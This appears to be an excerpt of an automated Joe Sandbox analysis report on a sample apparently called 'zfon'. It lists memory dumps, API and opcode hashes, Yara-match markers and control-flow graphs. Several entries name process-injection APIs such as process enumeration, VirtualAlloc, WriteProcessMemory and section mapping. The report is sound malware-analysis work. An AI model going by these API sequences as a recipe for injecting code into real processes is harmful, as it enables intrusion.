                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$Getdaysmallocmemcpy
                                                                                                                                                                            • String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                                                                                            • API String ID: 1347072587-3283725177
                                                                                                                                                                            APIs
                                                                                                                                                                            • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B3CD4D
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6B2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6D8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: memcpy.VCRUNTIME140(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6F0
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B3CD6A
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFBC1B3CD75
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$Getmonthsmallocmemcpy
                                                                                                                                                                            • String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December
                                                                                                                                                                            • API String ID: 1628830074-4232081075
                                                                                                                                                                            • Opcode ID: db95abb9d15dbef39e6ee0859203eea4f630d3aba3162c7ecd3a84709e9a22e3
                                                                                                                                                                            • Instruction ID: a516d3c8c6d76346975731d27ae36979aba54e3292ddc6e8cb9b5e79ff96b77f
                                                                                                                                                                            • Opcode Fuzzy Hash: db95abb9d15dbef39e6ee0859203eea4f630d3aba3162c7ecd3a84709e9a22e3
                                                                                                                                                                            • Instruction Fuzzy Hash: 19E0C969A14B4292EF009F62F59826A6360EF58B90F946035DA0E16756DF3CE4E4CB50
                                                                                                                                                                            APIs
                                                                                                                                                                            • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B3CCDD
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6B2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6D8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: memcpy.VCRUNTIME140(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6F0
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B3CCFA
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFBC1B3CD05
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$Getdaysmallocmemcpy
                                                                                                                                                                            • String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                                                                                            • API String ID: 1347072587-3283725177
                                                                                                                                                                            • Opcode ID: 4369f42fca7dce3118de04e163d293b9be384bdf3f2632a8f01c906decda58a8
                                                                                                                                                                            • Instruction ID: a2a9badbb009ba67c38e60d85cfed28a06f168839b7c983418294dbff2a79ee6
                                                                                                                                                                            • Opcode Fuzzy Hash: 4369f42fca7dce3118de04e163d293b9be384bdf3f2632a8f01c906decda58a8
                                                                                                                                                                            • Instruction Fuzzy Hash: EAE06555614B4292EF048F22F5443666360FF08B80F845435DA1D43755DF3CE4A4C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                            • API String ID: 932687459-410509341
                                                                                                                                                                            • Opcode ID: bc4d1c003b6ff2fe4e2c4e9266720bee0507f32f91a828decfd6544b21c815df
                                                                                                                                                                            • Instruction ID: d1c7cd60a729f1af9c43b258b481b815e3afd20fdd8fefd0a2f5be55caa04b27
                                                                                                                                                                            • Opcode Fuzzy Hash: bc4d1c003b6ff2fe4e2c4e9266720bee0507f32f91a828decfd6544b21c815df
                                                                                                                                                                            • Instruction Fuzzy Hash: B2D06762A1D98691EE20FF28E8953A9E330FB94708FD04471D18D46675EF6CDA46C750
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FFBC1B16CE9,?,?,?,?,00007FFBC1B205B2,?,?,?,?,?), ref: 00007FFBC1B16E83
                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FFBC1B16CE9,?,?,?,?,00007FFBC1B205B2,?,?,?,?,?), ref: 00007FFBC1B16F0C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                            • Opcode ID: 29fbcb28d85caf8942357daff49778de6b87ab13b42ab574bfe6367f35ca65f9
                                                                                                                                                                            • Instruction ID: dc15159058d2986fbdcec76c8f705245327761fa83c4604d85815c6504e97ea6
                                                                                                                                                                            • Opcode Fuzzy Hash: 29fbcb28d85caf8942357daff49778de6b87ab13b42ab574bfe6367f35ca65f9
                                                                                                                                                                            • Instruction Fuzzy Hash: AC1163A8E0964382FB149F35D8546772391AF487A1F256634DD2E273D5DE2CA4478E10
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FFBC1B03325,?,?,?,?,00007FFBC1B041CA,?,?,?,?,?), ref: 00007FFBC1B03483
                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FFBC1B03325,?,?,?,?,00007FFBC1B041CA,?,?,?,?,?), ref: 00007FFBC1B0350B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                            • Opcode ID: 868a6d6a1edc03e792c9974cc9c9f69a97d5c8a62993b42da19d3e438dcd092c
                                                                                                                                                                            • Instruction ID: c46c007699ca8109dbf46b78089d6e303300d07cd5700540074c38ff7816bbd4
                                                                                                                                                                            • Opcode Fuzzy Hash: 868a6d6a1edc03e792c9974cc9c9f69a97d5c8a62993b42da19d3e438dcd092c
                                                                                                                                                                            • Instruction Fuzzy Hash: 101124ECE1960285EB549F36E8D813A2759AF487A0F14A634D92E277F5EF2CE4518F00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                            • Opcode ID: 21e29c9922f19bdda75fb578db1eebbd38709f35706a816a21095b56aee0f4f3
                                                                                                                                                                            • Instruction ID: efb1d10032b5f49804bac3fe72210139754802fae7ef59000c69198da88baa7d
                                                                                                                                                                            • Opcode Fuzzy Hash: 21e29c9922f19bdda75fb578db1eebbd38709f35706a816a21095b56aee0f4f3
                                                                                                                                                                            • Instruction Fuzzy Hash: B1F0376AA18F0286EB449F26E9A427A2320FB8CF90F005071CA4D53B31DF2CE4A5CB10
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                            • Opcode ID: 2301427b651c3a47193e5a8d6ad951242187ad620a5bd31deb8cfb3ac87ac41d
                                                                                                                                                                            • Instruction ID: a7b7a5a855b387bd2a3626354849add95d3ef5db5d3e120a184ae6b3bafcd694
                                                                                                                                                                            • Opcode Fuzzy Hash: 2301427b651c3a47193e5a8d6ad951242187ad620a5bd31deb8cfb3ac87ac41d
                                                                                                                                                                            • Instruction Fuzzy Hash: 8AF0E76AA18F0296EB449F26E9A417A2320FB8CF80F146071DA4D53B75DF3CE4A5CB10
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                            • Opcode ID: 1505eafe45e457f4db7c5ee298ec8fe61a246f9253c397c6ee0353011936a2de
                                                                                                                                                                            • Instruction ID: a333e9b666ac6061d4b7898e46119ad29a106e139ecde49c7c08bbd2f317aaa5
                                                                                                                                                                            • Opcode Fuzzy Hash: 1505eafe45e457f4db7c5ee298ec8fe61a246f9253c397c6ee0353011936a2de
                                                                                                                                                                            • Instruction Fuzzy Hash: B6F0EC69618F0296EB449F25E9A41792320FB8CF90F145071DA4D53B75DF3CE4A5C710

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:1.2%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                            Signature Coverage:16.5%
                                                                                                                                                                            Total number of Nodes:346
                                                                                                                                                                            Total number of Limit Nodes:45
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Section$ViewVirtual$Protect$AllocCreateUnmap
                                                                                                                                                                            • String ID: @
                                                                                                                                                                            • API String ID: 814226357-2766056989
                                                                                                                                                                            • Opcode ID: 537dcba744a9e5ab819796c1abf8ff142b8021ff1599a3d2e9f8c20dbb037682
                                                                                                                                                                            • Instruction ID: fcab1204f94ae7232a265729345aeb8628f996360227b576c929d82beedcefa3
                                                                                                                                                                            • Opcode Fuzzy Hash: 537dcba744a9e5ab819796c1abf8ff142b8021ff1599a3d2e9f8c20dbb037682
                                                                                                                                                                            • Instruction Fuzzy Hash: 1362AE72A08B8587EB74DF39E4446ADB7A5FB88B98F804135DA8D47B44EF38E541C720

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_invalid_parameter_noinfo
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3629628435-0
                                                                                                                                                                            • Opcode ID: 58fc19107ec0e66d273cc40dc8bc3f342268e8061c34a6a0b169b5af377fc60a
                                                                                                                                                                            • Instruction ID: 24c62125876a52b3b8d2e18f5c7c401d330d9ca6ee48bb5278aac6f26644c87e
                                                                                                                                                                            • Opcode Fuzzy Hash: 58fc19107ec0e66d273cc40dc8bc3f342268e8061c34a6a0b169b5af377fc60a
                                                                                                                                                                            • Instruction Fuzzy Hash: 6D417870508B188FD795DF18D48875A77E1FB99314F40456EA44DD7295DB39C844CF82

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocMemoryProcessVirtualWrite_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2518834501-0
                                                                                                                                                                            • Opcode ID: 3929f3d7caecdf5a166518e108926a526826c599736ea3d0cce582099cd9f6e0
                                                                                                                                                                            • Instruction ID: d999fcaabc12cf896c2a96e18ca2a942f3e78959804f5a94b16d4fa95a621ff3
                                                                                                                                                                            • Opcode Fuzzy Hash: 3929f3d7caecdf5a166518e108926a526826c599736ea3d0cce582099cd9f6e0
                                                                                                                                                                            • Instruction Fuzzy Hash: 11229430514A4C4FEB95EF28C8997EAB7E1FF69304F40461AE48ED7692DF719980CB42

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InformationProcessQuery__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2261429478-0
                                                                                                                                                                            • Opcode ID: c26532dd56cd671d0a1b3ad32ebf9ddf33ffb71fd6066d7300b13c4462bb992f
                                                                                                                                                                            • Instruction ID: 9944dab390bd4176c14f04a29874e89e7822f54385933d55ce5acdb644a6b9c9
                                                                                                                                                                            • Opcode Fuzzy Hash: c26532dd56cd671d0a1b3ad32ebf9ddf33ffb71fd6066d7300b13c4462bb992f
                                                                                                                                                                            • Instruction Fuzzy Hash: 9751C830618F084FD758EB2CC48DBABB7D1F799315F10461EE48AD3695DE32A8858B83

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                                                                                                                                            • Instruction ID: 0837bfa1abdc9c7beca5119ec87565f4375ab1a2a0bd3d60d65a2d9a052e5785
                                                                                                                                                                            • Opcode Fuzzy Hash: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                                                                                                                                            • Instruction Fuzzy Hash: 4FB1C322B0D54682EA78EF3AA5412BDA391FB8CB84FC44136DA8D57685EF3CE451C770

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4069755476-0
                                                                                                                                                                            • Opcode ID: 52794ae43ef133f375a4d7fa53b1f961356637d67dbba59633ce44484efc1cfd
                                                                                                                                                                            • Instruction ID: 0023ce7f970144329f2996934de4029ef225e1cc19d070912a40a6463aa6a0c7
                                                                                                                                                                            • Opcode Fuzzy Hash: 52794ae43ef133f375a4d7fa53b1f961356637d67dbba59633ce44484efc1cfd
                                                                                                                                                                            • Instruction Fuzzy Hash: 7BC1CA30218E194FDFA4EF28C488BAA73D1FB99314F544A09D09ED7795DA36D885CF82

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 487 7ff79d0e9adf-7ff79d0e9afb 488 7ff79d0e9b16-7ff79d0e9b25 487->488 489 7ff79d0e9afd-7ff79d0e9b01 487->489 491 7ff79d0e9b51-7ff79d0e9b62 488->491 492 7ff79d0e9b27-7ff79d0e9b4c 488->492 489->488 490 7ff79d0e9b03-7ff79d0e9b14 489->490 490->488 490->489 493 7ff79d0e9b66-7ff79d0e9b6d 491->493 492->491 494 7ff79d0e9b6f-7ff79d0e9b7e 493->494 495 7ff79d0e9ba8-7ff79d0e9bad LoadLibraryA 493->495 496 7ff79d0e9b80-7ff79d0e9b99 call 7ff79d0ea34b 494->496 497 7ff79d0e9b9b-7ff79d0e9ba1 494->497 498 7ff79d0e9bb0-7ff79d0e9bbf 495->498 496->497 502 7ff79d0e9bc0-7ff79d0e9bc3 496->502 497->493 500 7ff79d0e9ba3-7ff79d0e9ba6 497->500 500->495 500->498 502->498
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
• Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                            • String ID: l

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandleInformationProcessQuery
                                                                                                                                                                            • String ID:

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                            • String ID:

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 680 26adfd97be0-26adfd97bf4 682 26adfd97bf6-26adfd97bfe 680->682 683 26adfd97bff-26adfd97c31 call 26adfd911b0 TlsFree 680->683
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free
                                                                                                                                                                            • String ID:

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 686 26adfdbe518-26adfdbe51b 687 26adfdbe553 686->687 688 26adfdbe51d-26adfdbe536 RtlFreeHeap 686->688 689 26adfdbe538-26adfdbe547 call 26adfdb06d8 call 26adfdb07ac 688->689 690 26adfdbe54e-26adfdbe552 688->690 689->690 690->687
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                            • String ID:

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 695 26adfd646b0-26adfd646ce 696 26adfd646d0-26adfd646da 695->696 697 26adfd646f9-26adfd64700 695->697 696->697 700 26adfd646dc-26adfd646ee CloseHandle 696->700 698 26adfd64729-26adfd64738 697->698 699 26adfd64702-26adfd6470c 697->699 699->698 701 26adfd6470e-26adfd6471e 699->701 700->697 702 26adfd646f0-26adfd646f4 700->702 701->698 704 26adfd64720-26adfd64724 701->704 702->697 704->698
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
• Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_string_utf16_set$cef_string_map_keycef_string_map_sizecef_string_map_value
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2359302636-0
                                                                                                                                                                            Memory Dump Source
